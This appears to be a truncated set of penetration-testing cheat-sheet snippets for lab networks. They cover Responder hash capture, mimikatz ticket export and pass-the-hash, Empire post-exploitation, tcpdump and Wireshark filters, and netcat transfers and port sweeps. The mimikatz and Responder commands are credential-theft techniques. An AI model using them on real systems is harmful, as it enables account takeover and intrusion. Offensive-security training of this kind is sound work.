- responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal an NTLM hash. (Source) Start responder on your own system: sudo responder -I tun0 --wpad Then connect from the target system to this system via SMB, in the Windows Explorer or on the command line via dir…
- Log on to another system with an NTLM hash. Scenario: Then, use mimikatz to inject another user's NTLM hash into the secret storage: Steal another user's session. Scenario: Then, with the use of mimikatz: privilege::debug sekurlsa::tickets /export This exports the available tickets into the working directory (suffix .kirbi). Then, choose one file/ticket from the correct user and service. For…
- Mainly post-exploitation for AD environments. (Download — also included in the Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule, don't forget to go "back" and to "interact" with the agent to see the job results! Commands with an asterisk require a high-integrity Empire agent. To upgrade one…
- tcpdump Get incoming ICMP packets: sudo tcpdump -i any icmp and src host $target Useful parameters: Do not resolve domain names, show IPs: -n Show a dump of the data: -X Show the packet in ASCII: -A Working with files: Write the dump to a file: tcpdump -w file Read a dump from a file: tcpdump -r file Standard queries: tcpdump -n src|dst 10.10.10.10 and port…
- See a packet in its context: context menu, select Follow. Show only ICMP packets from a host: tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside our own address: ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio: Wireshark can transform captured audio…
- Name confusion. Serve a file: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Request a file over SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Return the output of a program: ncat -l localhost 3000 --exec /bin/date Transfer a file directly (unencrypted!): 1. Receiver: user@host02:~$ ncat -l > aha or nc -nlvp 4444…
- General notes NC / Netcat: Try netcat first on interesting ports or narrow port ranges to be quieter. Network scan: Choose a port which is probably open on systems in this network, e.g. 445 for Windows hosts or 22 for Linux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…